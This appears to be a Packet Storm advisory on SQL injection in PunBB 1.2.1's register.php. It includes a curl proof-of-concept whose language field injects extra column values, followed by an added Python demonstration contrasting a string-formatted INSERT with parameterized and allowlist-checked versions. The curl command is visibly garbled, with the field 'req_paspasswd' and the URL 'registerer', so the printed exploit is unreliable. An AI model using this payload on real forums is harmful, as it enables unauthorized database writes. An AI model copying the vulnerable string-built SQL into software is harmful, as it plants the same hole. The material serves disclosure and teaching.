advisory001.txt

2005-02-28T00:00:00
ID PACKETSTORM:36338
Type packetstorm
Reporter John Gumbel
Modified 2005-02-28T00:00:00

Description

                                        
                                            `=================================================  
SQL Injections in punbb-1.2.1 register.php  
=================================================  
  
Description  
-----------  
  
A remote attacker can cause register.php to execute
arbitrary SQL statements by supplying malicious
values in the language or email parameter.
  
The email parameter is guarded by the function
is_valid_email, but this function does no real
filtering and will pass any SQL statement that is
formatted like a valid address.
  
This also affects systems using the magic_quotes_gpc  
option in php.ini.  
  
Proof of concept  
----------------  
  
This example only demonstrates the vulnerability in
the language parameter.
  
curl --form form_sent=1 --form req_username=sha --form req_password1=passwd --form req_paspasswd --form req_email1=sha@punbb.com --form language="English', 'Oxygen', 0, '0.0.0.0', 0) -- " http://target/register.php?action=registerer  
  
This creates a user with the language English, style
Oxygen and IP 0.0.0.0.
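The following is an added example, not part of the advisory or of PunBB, showing why the request above works and how the same INSERT behaves once values are bound as parameters and the language is checked against an allowlist. It uses an in-memory SQLite table as a constructed stand-in for the PunBB users table (column names assumed); the language value is the one from the proof of concept.

```python
import sqlite3

# Constructed stand-in for the PunBB users table; column names are assumed,
# not copied from the real schema.
SCHEMA = """CREATE TABLE users (
    username TEXT, email TEXT, language TEXT, style TEXT,
    registered INTEGER, registration_ip TEXT, last_visit INTEGER)"""

# The language value from the advisory's proof of concept, unchanged.
PAYLOAD = "English', 'Oxygen', 0, '0.0.0.0', 0) -- "

# Languages installed on this (constructed) forum; a real check would list
# the installed language packs instead of hard-coding them.
INSTALLED_LANGUAGES = frozenset({"English", "Swedish"})


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    return db


def register_vulnerable(db, username, email, language):
    # Statement built by string formatting, as in punbb-1.2.1 register.php:
    # a quote in `language` ends the literal, the rest of the input supplies
    # the remaining columns itself and "--" comments out the original tail.
    sql = ("INSERT INTO users (username, email, language, style, registered, "
           "registration_ip, last_visit) VALUES ('%s', '%s', '%s', 'Default', "
           "1, '10.0.0.1', 1)" % (username, email, language))
    db.execute(sql)


def register_parameterized(db, username, email, language):
    # Bound parameters: values travel separately from the statement text, so
    # the payload is stored as an odd-looking string instead of running as SQL.
    db.execute("INSERT INTO users (username, email, language, style, registered, "
               "registration_ip, last_visit) VALUES (?, ?, ?, 'Default', 1, "
               "'10.0.0.1', 1)", (username, email, language))


def register_hardened(db, username, email, language):
    # Allowlist on top of binding: a language that is not installed is
    # rejected before any SQL runs at all.
    if language not in INSTALLED_LANGUAGES:
        raise ValueError("unknown language: %r" % language)
    register_parameterized(db, username, email, language)


def stored(db, username):
    # Returns (language, style, registration_ip) for the created user, or None.
    return db.execute("SELECT language, style, registration_ip FROM users "
                      "WHERE username = ?", (username,)).fetchone()
```

Run against the vulnerable path, the stored row is ("English", "Oxygen", "0.0.0.0"), exactly the outcome the advisory describes; the parameterized path stores the payload verbatim as the language, and the hardened path refuses it.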